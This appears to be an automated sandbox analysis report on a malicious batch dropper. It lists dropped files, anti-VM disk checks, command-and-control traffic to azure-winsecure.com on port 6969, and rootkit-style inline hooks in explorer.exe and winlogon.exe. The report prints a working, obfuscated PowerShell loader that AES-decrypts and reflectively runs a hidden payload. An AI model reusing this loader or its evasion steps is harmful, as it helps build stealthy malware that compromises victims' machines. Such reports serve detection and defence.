                            Preview:ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.350996099530715
                            Encrypted:false
                            SSDEEP:384:dh+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwG:dOqabeGTnbuSxg6On
                            MD5:4A38F556B28847C79565F8F5B2E18529
                            SHA1:581498A0BC8A3EC2988AFE5C7FC0F60E14DF289A
                            SHA-256:E86ADB1001A17550D1F82D4B4136E5BD225EFC1D5456A36CE24E78834324A687
                            SHA-512:CE66231966337110F34D59C0E361E8859EE0B350AFFA40FAFAA47D58E105CD4D54F8ED8FA1B9A8F61E0C8F01CAA4CB364CDF58A9FC7BADDBF203EEE003F9F54F
                            Malicious:false
                            Preview:ElfChnk.....................................H...x....y......................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.421206160086997
                            Encrypted:false
                            SSDEEP:384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
                            MD5:67CAD90771EBC0BD20736201D89C1586
                            SHA1:EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
                            SHA-256:7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
                            SHA-512:27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
                            Malicious:false
                            Preview:ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):69752
                            Entropy (8bit):4.432394242976953
                            Encrypted:false
                            SSDEEP:384:qqmooWsoIKo+xooWrooWlooWrooW2qsFRzBO2M7t5ZoqRMteoO1nRBocgTo+ryyM:iH+DemRngbe9R
                            MD5:EE8158B63D705FFF801B791B44016C44
                            SHA1:14CBFBAB6E6AA4DE6C3F4E286DBC7934D96742C3
                            SHA-256:87DE0FBF45D47322673770905464FB86C7D1858AB65BA73A33A12202AAC66BCE
                            SHA-512:0A13AE408DFCC92991F779E403B299BB3DC13E3728A78642768E21951EC5560E3DB4153500A11D32288963E4B227CB9BBC74297878FE857DB82B09F81AE8CBB1
                            Malicious:false
                            Preview:ElfChnk.........-.......U...........................N.k$.....................................................................2..................Z...s...h...................=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:....................$......C+..3...........................&...............................................>.......................s5..........**......{........@..1.............>...............................................................F.............!....6.......... ..@..1.........O........t.......{........M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.A.u.d.i.t.i.n.g.%..TxT.I..>;.(..S.e.c.u.r.i.t.y....w"B........................N...........................................$.N......j.o.n.e.s...J.O.N.E.S.-.P.C...}@......M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.0.2.a.b.h.q.h.y.z.r.h.m.n.q.b.t...........%.%.8
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.418013163886424
                            Encrypted:false
                            SSDEEP:384:ZFR0Gu1Bb9w+1a7I+OkYDcND+S/qDhqqOc0qgfARMR2RvHeJvGAgXZIpURCOLiju:zC/JVMjynLmLQXHmtpJnqiNHpzoQp
                            MD5:9BDC273BED40B8666562C1CF55CF35AB
                            SHA1:C99C338E2B9DA3FEBE248763E66C4563B6155537
                            SHA-256:FC974E37E278EC66C1E07D4011E7CE0A54E7EFFADF9D6D565404F0161AD1913C
                            SHA-512:A44CA3655ABDE272ACB6261E7850256719366DDB509A0ADF5EFD0289B9A7642361FAEE0D6F903E1B477AA37C58D82B3DED121EEEC05BDA13E8CE69D246CA80B8
                            Malicious:false
                            Preview:ElfChnk.................m.......t...............`...P...........................................................................................,...s...h...............T...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...........................................................................................................................&...................**......m........g..0..........i.e&........i.e.t.Q...H.C.A;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):320504
                            Entropy (8bit):3.9318038850693373
                            Encrypted:false
                            SSDEEP:6144:UgfRHVgfRLgfR8VgfRBgfROgfRHVgfRLgfR8VgfRBgfR27aze3znaze2gfRHVgf1:
                            MD5:989FE11B6850F4E607A4BB44FE61EE3F
                            SHA1:3BE41878FD7BAACDE6262191CEFAB3482CF1C1CA
                            SHA-256:F4C05CF2479E1CEA9D7317E6ACFB8B91F6A3866CBBEC691090E100A1B3943172
                            SHA-512:08C945B764CA8D833ACEB8E648864A611B52B629BA9BD55E9801D61FFCB7A29732FCEFFADD1CB206D41B062C6FF9C6D654D9753DA976C767D32A20B064D5B796
                            Malicious:false
                            Preview:ElfChnk.....................................p.........?.....................................................................Z. ............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**................H"1..........B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.4664723531859085
                            Encrypted:false
                            SSDEEP:6144:sIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uN8dwBCswSb+:RXD94zWlLZMM6YFH6++
                            MD5:6C2338766D8478DF3B9442DF7361058B
                            SHA1:542BE768E8C7ADF462F6F6E80DA7E53FE7337AAE
                            SHA-256:730FA60EF15D586994FCE66B5D90A2B29E0F6117E8E2E78A9C56DA74FC212A6D
                            SHA-512:67840BB92130BDFC1733591A3596B45D599958638EE0C1F49E0B673FBA1781B0D72258483F429C5E2C51AC7300C55B4708095581A0FB79C6C93BEBE9A54AA64A
                            Malicious:false
                            Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..0...............................................................................................................................................................................................................................................................................................................................................t-..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\wbem\WMIADAP.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):3444
                            Entropy (8bit):5.011954215267298
                            Encrypted:false
                            SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                            MD5:B133A676D139032A27DE3D9619E70091
                            SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                            SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                            SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                            Malicious:false
                            Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):85
                            Entropy (8bit):4.84935141926561
                            Encrypted:false
                            SSDEEP:3:jKMFIwpVh+d3LKMP9IdXMfyM9oM3Ky:jKMFIsV8d7Koq01R3Ky
                            MD5:D8C4F9FD5B972AE487170EA993933179
                            SHA1:32E61F1DD8A462CEDC6B7A636275363B011ABDA9
                            SHA-256:728A155A3A8272BB230C121C67CC90A986C11B84504E3902AC4EEDA9D8EC78ED
                            SHA-512:1F4E7C0C8DC83C0280E77290CF76738D0611FBB9ADBC4D76A7DF4FD2E1EE49F684400E16008ED58D89009D4FE67C456094E9610279B4A20DDAC39038A3F5D4DF
                            Malicious:false
                            Preview:Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden ..
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with very long lines (2692), with CRLF line terminators
                            Category:dropped
                            Size (bytes):2839
                            Entropy (8bit):5.269550461652421
                            Encrypted:false
                            SSDEEP:48:9JFHDRBXRG8R4YRxyKB3k4B3KX9zS3FXBvY595f8bLb8MS91ccCwMqu1whc9pWiM:PFHDRtVt7vBpB6a5xY595f8bus3wMVd2
                            MD5:39401ABDD4A08EE5458DF7CB80F69CED
                            SHA1:A4F498F6E926AC3A23F561C1C582C51217FA9093
                            SHA-256:06CC781B4C21259ED5B86C26A54BFCFD61D5049BF62338571F77E801227FFAC1
                            SHA-512:7BC97E8DF1C92730F6462151B688F1A5952F220199BD52F963A6CEA4DC04EEF6C842D776D26DF845688C369935DD71FFFE269AA75DC10B017F5926D21448C9BD
                            Malicious:false
                            Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function Rgueq($eXEDy){.$HKJEc=[System.Security.Cryptography.Aes]::Create();.$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ=');.$HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA==');.$HipTi=$HKJEc.CreateDecryptor();.$ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length);.$HipTi.Dispose();.$HKJEc.Dispose();.$ioqgE;}function qVeuI($eXEDy){.Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', '');.Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblc
                            File type:DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators
                            Entropy (8bit):6.008710946572079
                            TrID:
                            • BibTeX references (5501/1) 100.00%
                            File name:1.cmd
                            File size:5'214'429 bytes
                            MD5:19fc666f7494d78a55d6b50a0252c214
                            SHA1:8876cd520507cbfdc2e89e449baba52232a1df1b
                            SHA256:e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
                            SHA512:94dde8d5d0100e892ca004556b30b8e8fedacc1e3482dab9d611bd64569b2f73e29da93db2c7ae51585791a4f39d01426ee6663c48602de92aa74f6ebe3f630a
                            SSDEEP:49152:9YFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:f
                            TLSH:8536120B1D54ECBECDA50DAEE95A2F0FF432BE57F02909B6611B05BD07781E104D9A3A
                            File Content Preview:@echo off..%^%@%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJq
                            Icon Hash:9686878b929a9886
                             Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                             Oct 4, 2024 09:43:11.225049973 CEST  49835        6969       192.168.2.4    192.64.119.55
                             Oct 4, 2024 09:43:11.229967117 CEST  6969         49835      192.64.119.55  192.168.2.4
                             Oct 4, 2024 09:43:11.230060101 CEST  49835        6969       192.168.2.4    192.64.119.55
                             Oct 4, 2024 09:43:11.238358021 CEST  49835        6969       192.168.2.4    192.64.119.55
                             Oct 4, 2024 09:43:11.243372917 CEST  6969         49835      192.64.119.55  192.168.2.4
                             Oct 4, 2024 09:43:32.616575003 CEST  6969         49835      192.64.119.55  192.168.2.4
                             Oct 4, 2024 09:43:32.616772890 CEST  49835        6969       192.168.2.4    192.64.119.55
                             Oct 4, 2024 09:43:32.623522043 CEST  49835        6969       192.168.2.4    192.64.119.55
                             Oct 4, 2024 09:43:32.628834009 CEST  6969         49835      192.64.119.55  192.168.2.4
                             Oct 4, 2024 09:43:36.349204063 CEST  49993        6969       192.168.2.4    192.64.119.55
                             Oct 4, 2024 09:43:36.358129025 CEST  6969         49993      192.64.119.55  192.168.2.4
                             Oct 4, 2024 09:43:36.359184027 CEST  49993        6969       192.168.2.4    192.64.119.55
                             Oct 4, 2024 09:43:36.361568928 CEST  49993        6969       192.168.2.4    192.64.119.55
                             Oct 4, 2024 09:43:36.374773979 CEST  6969         49993      192.64.119.55  192.168.2.4
                             Oct 4, 2024 09:43:57.712136030 CEST  6969         49993      192.64.119.55  192.168.2.4
                             Oct 4, 2024 09:43:57.712508917 CEST  49993        6969       192.168.2.4    192.64.119.55
                             Oct 4, 2024 09:43:57.712898016 CEST  49993        6969       192.168.2.4    192.64.119.55
                             Oct 4, 2024 09:43:57.717854977 CEST  6969         49993      192.64.119.55  192.168.2.4
                             Oct 4, 2024 09:44:01.113701105 CEST  50016        6969       192.168.2.4    192.64.119.55
                             Oct 4, 2024 09:44:01.119086981 CEST  6969         50016      192.64.119.55  192.168.2.4
                             Oct 4, 2024 09:44:01.119292974 CEST  50016        6969       192.168.2.4    192.64.119.55
                             Oct 4, 2024 09:44:01.119541883 CEST  50016        6969       192.168.2.4    192.64.119.55
                             Oct 4, 2024 09:44:01.124370098 CEST  6969         50016      192.64.119.55  192.168.2.4
                             Oct 4, 2024 09:44:22.509109020 CEST  6969         50016      192.64.119.55  192.168.2.4
                             Oct 4, 2024 09:44:22.509397030 CEST  50016        6969       192.168.2.4    192.64.119.55
                             Oct 4, 2024 09:44:33.882853031 CEST  50016        6969       192.168.2.4    192.64.119.55
                             Oct 4, 2024 09:44:33.888209105 CEST  6969         50016      192.64.119.55  192.168.2.4
                            Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
                            Oct 4, 2024 09:43:11.203910112 CEST | 62732       | 53        | 192.168.2.4 | 1.1.1.1
                            Oct 4, 2024 09:43:11.218769073 CEST | 53          | 62732     | 1.1.1.1     | 192.168.2.4

                            Timestamp                           | Source IP   | Dest IP | Trans ID | OP Code            | Name                | Type           | Class       | DNS over HTTPS
                            Oct 4, 2024 09:43:11.203910112 CEST | 192.168.2.4 | 1.1.1.1 | 0x3e9a   | Standard query (0) | azure-winsecure.com | A (IP address) | IN (0x0001) | false

                            Timestamp                           | Source IP | Dest IP     | Trans ID | Reply Code   | Name                | CName | Address       | Type           | Class       | DNS over HTTPS
                            Oct 4, 2024 09:43:11.218769073 CEST | 1.1.1.1   | 192.168.2.4 | 0x3e9a   | No error (0) | azure-winsecure.com |       | 192.64.119.55 | A (IP address) | IN (0x0001) | false

                            Code Manipulations

                            Function Name                 | Hook Type | Active in Processes
                            ZwEnumerateKey                | INLINE    | explorer.exe, winlogon.exe
                            NtQuerySystemInformation      | INLINE    | explorer.exe, winlogon.exe
                            ZwResumeThread                | INLINE    | explorer.exe, winlogon.exe
                            NtDeviceIoControlFile         | INLINE    | explorer.exe, winlogon.exe
                            ZwDeviceIoControlFile         | INLINE    | explorer.exe, winlogon.exe
                            NtEnumerateKey                | INLINE    | explorer.exe, winlogon.exe
                            NtQueryDirectoryFile          | INLINE    | explorer.exe, winlogon.exe
                            ZwEnumerateValueKey           | INLINE    | explorer.exe, winlogon.exe
                            ZwQuerySystemInformation      | INLINE    | explorer.exe, winlogon.exe
                            NtResumeThread                | INLINE    | explorer.exe, winlogon.exe
                            RtlGetNativeSystemInformation | INLINE    | explorer.exe, winlogon.exe
                            NtQueryDirectoryFileEx        | INLINE    | explorer.exe, winlogon.exe
                            NtEnumerateValueKey           | INLINE    | explorer.exe, winlogon.exe
                            ZwQueryDirectoryFileEx        | INLINE    | explorer.exe, winlogon.exe
                            ZwQueryDirectoryFile          | INLINE    | explorer.exe, winlogon.exe
                            Function Name                 | Hook Type | New Data
                            ZwEnumerateKey                | INLINE    | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                            NtQuerySystemInformation      | INLINE    | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                            ZwResumeThread                | INLINE    | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                            NtDeviceIoControlFile         | INLINE    | 0xE9 0x90 0x03 0x33 0x34 0x4F
                            ZwDeviceIoControlFile         | INLINE    | 0xE9 0x90 0x03 0x33 0x34 0x4F
                            NtEnumerateKey                | INLINE    | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                            NtQueryDirectoryFile          | INLINE    | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                            ZwEnumerateValueKey           | INLINE    | 0xE9 0x90 0x03 0x33 0x31 0x1F
                            ZwQuerySystemInformation      | INLINE    | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                            NtResumeThread                | INLINE    | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                            RtlGetNativeSystemInformation | INLINE    | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                            NtQueryDirectoryFileEx        | INLINE    | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                            NtEnumerateValueKey           | INLINE    | 0xE9 0x90 0x03 0x33 0x31 0x1F
                            ZwQueryDirectoryFileEx        | INLINE    | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                            ZwQueryDirectoryFile          | INLINE    | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                            Every entry begins with 0xE9, the x86 near-jump opcode, followed by a four-byte relative displacement: each function prolog in explorer.exe and winlogon.exe has been overwritten with a jump into the injected code. Nt/Zw pairs share the same bytes because they are the same export; the hooked set covers registry key and value enumeration, directory listing and process enumeration, which is what lets the implant hide its registry keys, files and processes from user-mode tools.

                            Target ID:0
                            Start time:03:41:59
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" "
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:1
                            Start time:03:41:59
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:2
                            Start time:03:41:59
                            Start date:04/10/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:wmic diskdrive get Model
                            Imagebase:0x7ff78ee20000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:3
                            Start time:03:41:59
                            Start date:04/10/2024
                            Path:C:\Windows\System32\findstr.exe
                            Wow64 process (32bit):false
                            Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                            Imagebase:0x7ff624f90000
                            File size:36'352 bytes
                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:4
                            Start time:03:42:00
                            Start date:04/10/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:wmic diskdrive get Manufacturer,Model
                            Imagebase:0x7ff78ee20000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:5
                            Start time:03:42:00
                            Start date:04/10/2024
                            Path:C:\Windows\System32\findstr.exe
                            Wow64 process (32bit):false
                            Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                            Imagebase:0x7ff624f90000
                            File size:36'352 bytes
                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:6
                            Start time:03:42:02
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq 